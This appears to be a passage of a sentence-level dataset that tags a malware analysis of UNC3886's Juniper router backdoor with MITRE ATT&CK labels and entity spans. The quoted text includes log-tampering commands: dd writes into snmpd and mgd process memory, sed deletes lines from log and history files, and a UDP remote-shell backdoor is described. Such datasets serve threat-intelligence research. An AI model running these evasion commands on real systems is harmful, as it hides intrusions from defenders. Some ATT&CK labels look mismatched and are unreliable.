"* } restore() { #reconfig cp -r /var/rundb+/* /var/rundb cp /usr/lib/libjucomm.so.1 /var/db/commits tar -xf /config/usage_db -C / tar -xf /var/db/config/usage_db -C / rm -r /var/rundb+ rm -f /usr/lib/libjucomm.so.1 rm -f /config/", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Restores config files from archive, and deletes all temporary cleanup artifacts", "entities": [ { "text": "/var/rundb", "start": 32, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "/usr/lib/libjucomm.so.1", "start": 191, "end": 214, "label": "Infrastructure_Indicator" }, { "text": "/config/usage_db", "start": 108, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "cp", "start": 26, "end": 28, "label": "Action" }, { "text": "tar", "start": 100, "end": 103, "label": "Action" }, { "text": "rm", "start": 215, "end": 217, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s79-89d2e4", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "* } restore() { #reconfig cp -r /var/rundb+/* /var/rundb cp /usr/lib/libjucomm.so.1 /var/db/commits tar -xf /config/usage_db -C / tar -xf /var/db/config/usage_db -C / rm -r /var/rundb+ rm -f /usr/lib/libjucomm.so.1 rm -f /config/", "sentence_text": "usage_db rm -f /var/db/config/usage_db } if [ $1 = \"pre\" ]; then pre_ssh elif [ $1 = \"post\" ]; then post_ssh elif [ $1 = \"backup\" ]; then backup elif [ $1 = \"restore\" ]; then restore fi echo done exit 0", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "uses command line arguments to execute pre_ssh, post_ssh, backup, or restore functions", "entities": [ { "text": "/var/db/config/usage_db", "start": 15, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "rm", "start": 9, "end": 11, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s80-ea8ca2", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "usage_db rm -f /var/db/config/usage_db } if [ $1 = \"pre\" ]; then pre_ssh elif [ $1 = \"post\" ]; then post_ssh elif [ $1 = \"backup\" ]; then backup elif [ $1 = \"restore\" ]; then restore fi echo done exit 0", "sentence_text": "This script can execute 4 commands:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s81-9a9f55", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 81, "context_before": "This script can execute 4 commands:", "sentence_text": "pre\n: backups\nsyslog.conf\nas\nsyslog.conf0\n, it also redirects all logging to /dev/null , sends HUP signal to eventd daemon responsible for logging and backs up last log and wtmp log.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.002", "name": "Disable Windows Event Logging" } ], "procedure": "redirects all logging to /dev/null, sends HUP signal to eventd daemon", "entities": [ { "text": "syslog.conf0", "start": 29, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "syslog.conf", "start": 14, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "eventd", "start": 109, "end": 115, "label": "Infrastructure_Indicator" }, { "text": "backups", "start": 6, "end": 13, "label": "Action" }, { "text": "redirects", "start": 52, "end": 61, "label": "Action" }, { "text": "sends", "start": 89, "end": 94, "label": "Action" }, { "text": "backs up", "start": 151, "end": 159, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s82-3f4e2c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "pre\n: backups\nsyslog.conf\nas\nsyslog.conf0\n, it also redirects all logging to /dev/null , sends HUP signal to eventd daemon responsible for logging and backs up last log and wtmp log.", "sentence_text": "post\n: reverses changes done by pre_ssh , it restores original syslog.conf as well as last log and wtmp log, it removes backups and sends another HUP signal to eventd process.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "restores original syslog.conf, removes backups", "entities": [ { "text": "syslog.conf", "start": 63, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "eventd", "start": 160, "end": 166, "label": "Infrastructure_Indicator" }, { "text": "restores", "start": 45, "end": 53, "label": "Action" }, { "text": "removes", "start": 112, "end": 119, "label": "Action" }, { "text": "sends", "start": 132, "end": 137, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s83-d08b53", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "post\n: reverses changes done by pre_ssh , it restores original syslog.conf as well as last log and wtmp log, it removes backups and sends another HUP signal to eventd process.", "sentence_text": "backup\n: it backups the current Juniper configuration database and commit logs and archives configuration files.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1560.001", "name": "Archive via Utility" } ], "procedure": "archives configuration files", "entities": [ { "text": "Juniper", "start": 32, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "backups", "start": 12, "end": 19, "label": "Action" }, { "text": "archives", "start": 83, "end": 91, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s84-83341b", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "backup\n: it backups the current Juniper configuration database and commit logs and archives configuration files.", "sentence_text": "restore\n: it restores previously backed up configuration database and config files and removes backups.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "restores previously backed up configuration, removes backups", "entities": [ { "text": "restores previously backed up configuration", "start": 13, "end": 56, "label": "Action" }, { "text": "removes backups", "start": 87, "end": 102, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s85-51e298", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "restore\n: it restores previously backed up configuration database and config files and removes backups.", "sentence_text": "After stopping logging with pre_ssh script, this command then reads the snmpd process PID from /var/run/snmpd.pid .", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1033", "name": "System Owner/User Discovery" } ], "procedure": "reads the snmpd process PID", "entities": [ { "text": "/var/run/snmpd.pid", "start": 95, "end": 113, "label": "Infrastructure_Indicator" }, { "text": "reads", "start": 62, "end": 67, "label": "Action" }, { "text": "pre_ssh script", "start": 28, "end": 42, "label": "MalwareTool" } ] }, { "uid": "mitre-93_mitre_report-p1-s86-e5f291", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 86, "context_before": "After stopping logging with pre_ssh script, this command then reads the snmpd process PID from /var/run/snmpd.pid .", "sentence_text": "It also reads 4 bytes of data from address 0x8601328 and writes it to the file /var/tmp/rts by using dd :\ndd if=/proc//mem of=/var/tmp/rts bs=1 count=4", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "reads 4 bytes of data from address 0x8601328", "entities": [ { "text": "/var/tmp/rts ", "start": 79, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "/proc//mem", "start": 112, "end": 127, "label": "Infrastructure_Indicator" }, { "text": "reads", "start": 8, "end": 13, "label": "Action" }, { "text": "writes", "start": 57, "end": 63, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s87-b4258a", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 87, "context_before": "It also reads 4 bytes of data from address 0x8601328 and writes it to the file /var/tmp/rts by using dd :\ndd if=/proc//mem of=/var/tmp/rts bs=1 count=4", "sentence_text": "iseek=0x8601328 2>/dev/null It then changes this data to 0 and writes it to /var/tmp/rts and later back to snmpd process memory using the same dd technique:\ndd of=/proc//mem if=/var/tmp/rts bs=1 count=4", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "changes this data to 0, writes it back to snmpd process memory", "entities": [ { "text": "/var/tmp/rts", "start": 76, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "/proc//mem", "start": 163, "end": 178, "label": "Infrastructure_Indicator" }, { "text": "changes", "start": 36, "end": 43, "label": "Action" }, { "text": "writes", "start": 63, "end": 69, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s88-a63074", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 88, "context_before": "iseek=0x8601328 2>/dev/null It then changes this data to 0 and writes it to /var/tmp/rts and later back to snmpd process memory using the same dd technique:\ndd of=/proc//mem if=/var/tmp/rts bs=1 count=4", "sentence_text": "oseek=0x8601328 conv=notrunc 2>/dev/null This patches the snmpd process memory at address 0x8601328 .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "patches the snmpd process memory", "entities": [ { "text": "snmpd", "start": 58, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "patches", "start": 46, "end": 53, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s89-43b703", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 89, "context_before": "oseek=0x8601328 conv=notrunc 2>/dev/null This patches the snmpd process memory at address 0x8601328 .", "sentence_text": "The patch sets a global variable named trap_configs to 0.\ntrap_configs\npossibly points to a structure containing SNMP traps that are sent to the monitoring server.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "sets a global variable to 0", "entities": [ { "text": "trap_configs", "start": 39, "end": 51, "label": "MalwareTool" }, { "text": "SNMP", "start": 113, "end": 117, "label": "Infrastructure_Indicator" }, { "text": "sets", "start": 10, "end": 14, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s90-07405d", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 90, "context_before": "The patch sets a global variable named trap_configs to 0.\ntrap_configs\npossibly points to a structure containing SNMP traps that are sent to the monitoring server.", "sentence_text": "Effectively this stops SNMP traps from being triggered which is most likely done to stop SNMP traps from triggering when specific events stop being logged in syslog.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "stops SNMP traps from being triggered", "entities": [ { "text": "SNMP", "start": 89, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "stops", "start": 17, "end": 22, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s91-fb3fed", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 91, "context_before": "Effectively this stops SNMP traps from being triggered which is most likely done to stop SNMP traps from triggering when specific events stop being logged in syslog.", "sentence_text": "The malware then repeats similar actions against the mgd (Juniper Management Daemon) process.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "repeats similar actions against the mgd process", "entities": [ { "text": "mgd (Juniper Management Daemon) process", "start": 53, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "repeats", "start": 17, "end": 24, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s92-3f4a76", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 92, "context_before": "The malware then repeats similar actions against the mgd (Juniper Management Daemon) process.", "sentence_text": "It reads mgd process PID from /var/run/mgd.pid and using the same technique previously mentioned it reads 4 bytes from mgd process memory at 0x84E90D8 .", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "reads mgd process PID, reads 4 bytes from mgd process memory", "entities": [ { "text": "mgd", "start": 119, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "reads mgd process PID", "start": 3, "end": 24, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s93-cb4a9b", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 93, "context_before": "It reads mgd process PID from /var/run/mgd.pid and using the same technique previously mentioned it reads 4 bytes from mgd process memory at 0x84E90D8 .", "sentence_text": "This direct memory manipulation using dd allows the attacker to alter program behavior and bypass security measures.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "direct memory manipulation, alter program behavior, bypass security measures", "entities": [ { "text": "attacker", "start": 52, "end": 60, "label": "ThreatActor" }, { "text": "alter program behavior", "start": 64, "end": 86, "label": "Action" }, { "text": "bypass security measures", "start": 91, "end": 115, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s94-45b3cb", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 94, "context_before": "This direct memory manipulation using dd allows the attacker to alter program behavior and bypass security measures.", "sentence_text": "UNC3886 previously used a similar tactic, where dd was used to disable file system verification on startup .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "disable file system verification on startup", "entities": [ { "text": "UNC3886", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "disable", "start": 63, "end": 70, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s95-acd7d4", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 95, "context_before": "UNC3886 previously used a similar tactic, where dd was used to disable file system verification on startup .", "sentence_text": "In that case, UNC3886 exploited a vulnerability (CVE-2022-41328) to overwrite legitimate FortiOS system binaries, achieving persistence and evading security checks.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": "overwrite legitimate FortiOS system binaries", "entities": [ { "text": "UNC3886", "start": 14, "end": 21, "label": "ThreatActor" }, { "text": "CVE-2022-41328", "start": 49, "end": 63, "label": "MalwareTool" }, { "text": "FortiOS", "start": 89, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "exploited a vulnerability", "start": 22, "end": 47, "label": "Action" }, { "text": "overwrite", "start": 68, "end": 77, "label": "Action" }, { "text": "achieving persistence", "start": 114, "end": 135, "label": "Action" }, { "text": "evading security checks", "start": 140, "end": 163, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s96-63dadb", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 96, "context_before": "In that case, UNC3886 exploited a vulnerability (CVE-2022-41328) to overwrite legitimate FortiOS system binaries, achieving persistence and evading security checks.", "sentence_text": "Command\nThis command can reverse operations performed by Command 0 after the operator finished their hands-on-keyboard operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s97-5ed53d", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 97, "context_before": "Command\nThis command can reverse operations performed by Command 0 after the operator finished their hands-on-keyboard operations.", "sentence_text": "It restores logging by executing sh /var/tmp/pfed_jdhcp6_trace.log.bak post , it also reverses patches to snmpd and mgd Command — Launch CSH Session", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.002", "name": "Clear Linux or Mac System Logs" } ], "procedure": "Execute a shell command to restore logging and reverse patches applied to system services.", "entities": [ { "text": "executing sh /var/tmp/pfed_jdhcp6_trace.log.bak post", "start": 23, "end": 75, "label": "Action" }, { "text": "restores logging", "start": 3, "end": 19, "label": "Action" }, { "text": "reverses patches", "start": 86, "end": 102, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s98-0c2d97", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 98, "context_before": "It restores logging by executing sh /var/tmp/pfed_jdhcp6_trace.log.bak post , it also reverses patches to snmpd and mgd Command — Launch CSH Session", "sentence_text": "This command launches an interactive /bin/csh session over the UDP connection, with a forked process encrypting the input and output of the shell and transmitting it over the network.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "launches an interactive /bin/csh session", "entities": [ { "text": "UDP", "start": 63, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "launches", "start": 13, "end": 21, "label": "Action" }, { "text": "encrypting the input", "start": 101, "end": 121, "label": "Action" }, { "text": "transmitting it over the network", "start": 150, "end": 182, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s99-9bc788", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 99, "context_before": "This command launches an interactive /bin/csh session over the UDP connection, with a forked process encrypting the input and output of the shell and transmitting it over the network.", "sentence_text": "Before executing remote shell, this commands launches a series of sed commands to remove specific lines from log files:\nsed -i '' '/root/d' /var/log/interactive-commands sed -i '' -e '/vi/d' -e '/set/", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.002", "name": "Clear Linux or Mac System Logs" } ], "procedure": "remove specific lines from log files", "entities": [ { "text": "/var/log/interactive-commands", "start": 140, "end": 169, "label": "Infrastructure_Indicator" }, { "text": "remove specific lines from log files", "start": 82, "end": 118, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s100-32f097", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 100, "context_before": "Before executing remote shell, this commands launches a series of sed commands to remove specific lines from log files:\nsed -i '' '/root/d' /var/log/interactive-commands sed -i '' -e '/vi/d' -e '/set/", "sentence_text": "d' -e '/gdb/d' -e '/mgd/d' /root/.history sed -i '' '/root/", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.003", "name": "Clear Command History" } ], "procedure": "None", "entities": [ { "text": "/root/.histor", "start": 27, "end": 40, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-93_mitre_report-p1-s101-e97272", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 101, "context_before": "d' -e '/gdb/d' -e '/mgd/d' /root/.history sed -i '' '/root/", "sentence_text": "d' /var/log/messages sed -i '' '/root/", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.002", "name": "Clear Linux or Mac System Logs" } ], "procedure": "None", "entities": [ { "text": "/var/log/messages", "start": 3, "end": 20, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-93_mitre_report-p1-s103-b45f9c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 103, "context_before": "d' /var/log/auth", "sentence_text": "The response to that message will contain the new 4-byte sleep timeout that will be used by the main command loop (in seconds).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s104-8b5aeb", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 104, "context_before": "The response to that message will contain the new 4-byte sleep timeout that will be used by the main command loop (in seconds).", "sentence_text": "Command\n— File Upload This command will cause the malware to send a specified file to the remote server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s105-efc3a5", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 105, "context_before": "Command\n— File Upload This command will cause the malware to send a specified file to the remote server.", "sentence_text": "Command\n— File Download", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s106-dad94c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 106, "context_before": "Command\n— File Download", "sentence_text": "This command will cause the malware to download a file from the remote server and write it to the disk.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "download a file from the remote server", "entities": [ { "text": "malware", "start": 28, "end": 35, "label": "MalwareTool" }, { "text": "download a file from the remote server", "start": 39, "end": 77, "label": "Action" }, { "text": "write it to the disk", "start": 82, "end": 102, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s107-457e4c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 107, "context_before": "This command will cause the malware to download a file from the remote server and write it to the disk.", "sentence_text": "Command\n— Backup Configuration Database", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1602.002", "name": "Network Device Configuration Dump" } ], "procedure": "Backup Configuration Database", "entities": [ { "text": "Backup", "start": 10, "end": 16, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s108-a9ef26", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 108, "context_before": "Command\n— Backup Configuration Database", "sentence_text": "This command causes the malware to execute the same script as Command 0 but with argument backup to backup Juniper configuration database and commit logs.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1602.002", "name": "Network Device Configuration Dump" } ], "procedure": "backup Juniper configuration database and commit logs", "entities": [ { "text": "Juniper", "start": 107, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "execute", "start": 35, "end": 42, "label": "Action" }, { "text": "backup", "start": 100, "end": 106, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s109-9c1b32", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 109, "context_before": "This command causes the malware to execute the same script as Command 0 but with argument backup to backup Juniper configuration database and commit logs.", "sentence_text": "gzip -d /var/tmp/pfed_jdhcp6_trace.log -c > /var/tmp/pfed_jdhcp6_trace.log.bak;\nsh /var/tmp/pfed_jdhcp6_trace.log.bak backup ;", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1602.002", "name": "Network Device Configuration Dump" } ], "procedure": "executes script with backup argument", "entities": [ { "text": "gzip", "start": 0, "end": 4, "label": "MalwareTool" }, { "text": "/var/tmp/pfed_jdhcp6_trace.log", "start": 8, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "/var/tmp/pfed_jdhcp6_trace.log.bak", "start": 44, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "/var/tmp/pfed_jdhcp6_trace.log.bak backup", "start": 83, "end": 124, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-93_mitre_report-p1-s110-c7a871", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 110, "context_before": "gzip -d /var/tmp/pfed_jdhcp6_trace.log -c > /var/tmp/pfed_jdhcp6_trace.log.bak;\nsh /var/tmp/pfed_jdhcp6_trace.log.bak backup ;", "sentence_text": "rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;\nkill -9 $$ Command — Restore configuration database This command causes the malware to execute the same script as Command 0 but with argument restore to restore Juniper configuration database and commit logs:\ngzip -d /var/tmp/pfed_jdhcp6_trace.log -c > /var/tmp/pfed_jdhcp6_trace.log.bak;\nsh /var/tmp/pfed_jdhcp6_trace.log.bak restore ;", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" }, { "id": "T1490", "name": "Inhibit System Recovery" } ], "procedure": "restore Juniper configuration database, rm -rf, kill -9", "entities": [ { "text": "Juniper", "start": 236, "end": 243, "label": "Infrastructure_Indicator" }, { "text": "/var/tmp/pfed_jdhcp6_trace.log", "start": 7, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "/var/tmp/pfed_jdhcp6_trace.log.bak", "start": 38, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "rm ", "start": 0, "end": 3, "label": "Action" }, { "text": "gzip", "start": 284, "end": 288, "label": "MalwareTool" }, { "text": "execute the same script as Command 0", "start": 162, "end": 198, "label": "Action" }, { "text": "restore", "start": 228, "end": 235, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s111-52491c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 111, "context_before": "rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;\nkill -9 $$ Command — Restore configuration database This command causes the malware to execute the same script as Command 0 but with argument restore to restore Juniper configuration database and commit logs:\ngzip -d /var/tmp/pfed_jdhcp6_trace.log -c > /var/tmp/pfed_jdhcp6_trace.log.bak;\nsh /var/tmp/pfed_jdhcp6_trace.log.bak restore ;", "sentence_text": "rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;\nkill -9 $$ Command - Receive new socket timeout value This command will cause the malware to send a reply to the connection containing the value of the current socket timeout.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" }, { "id": "T1029", "name": "Scheduled Transfer" } ], "procedure": "rm -rf, kill -9, send a reply containing the current socket timeout", "entities": [ { "text": "/var/tmp/pfed_jdhcp6_trace.log", "start": 7, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "/var/tmp/pfed_jdhcp6_trace.log.bak ", "start": 38, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "rm", "start": 0, "end": 2, "label": "Action" }, { "text": "kill", "start": 75, "end": 79, "label": "Action" }, { "text": "send", "start": 168, "end": 172, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s112-63e9d2", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 112, "context_before": "rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;\nkill -9 $$ Command - Receive new socket timeout value This command will cause the malware to send a reply to the connection containing the value of the current socket timeout.", "sentence_text": "The response to that message will contain the new 4-byte value that will be used to update the main socket timeout.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1029", "name": "Scheduled Transfer" } ], "procedure": "update the main socket timeout", "entities": [ { "text": "update the main socket timeout", "start": 84, "end": 114, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s113-fa2037", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 113, "context_before": "The response to that message will contain the new 4-byte value that will be used to update the main socket timeout.", "sentence_text": "The default socket timeout value is 300 seconds If any other command is passed, malware will close the socket and exit.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1029", "name": "Scheduled Transfer" }, { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "close the socket and exit", "entities": [ { "text": "close", "start": 93, "end": 98, "label": "Action" }, { "text": "exit", "start": 114, "end": 118, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s114-f593cd", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 114, "context_before": "The default socket timeout value is 300 seconds If any other command is passed, malware will close the socket and exit.", "sentence_text": "It implements a UDP backdoor operating on a fixed port number which provides file transfer and remote shell capabilities.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" }, { "id": "T1059.004", "name": "Unix Shell" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "file transfer and remote shell capabilities", "entities": [ { "text": "UDP", "start": 16, "end": 19, "label": "Infrastructure_Indicator" }, { "text": "implements", "start": 3, "end": 13, "label": "Action" }, { "text": "provides file transfer", "start": 68, "end": 90, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s115-39bef6", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 115, "context_before": "It implements a UDP backdoor operating on a fixed port number which provides file transfer and remote shell capabilities.", "sentence_text": "Malware binds to UDP port 33512 and uses a custom RC4 implementation.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" }, { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "binds to UDP port 33512 and uses a custom RC4 implementation", "entities": [ { "text": "UDP port 33512", "start": 17, "end": 31, "label": "Infrastructure_Indicator" }, { "text": "binds to UDP port 33512 and uses a custom RC4 implementation", "start": 8, "end": 68, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s116-291fa2", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 116, "context_before": "Malware binds to UDP port 33512 and uses a custom RC4 implementation.", "sentence_text": "This implementation has a bug in it where it doesn't properly retrieve a final state box value during its PRGA generation.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "custom RC4 implementation has a bug that prevents proper retrieval of a final state box value during PRGA generation", "entities": [ { "text": "implementation", "start": 5, "end": 19, "label": "MalwareTool" }, { "text": "PRGA generation.", "start": 106, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "retrieve a final state box", "start": 62, "end": 88, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s117-94392d", "source": "mitre", "doc_id": 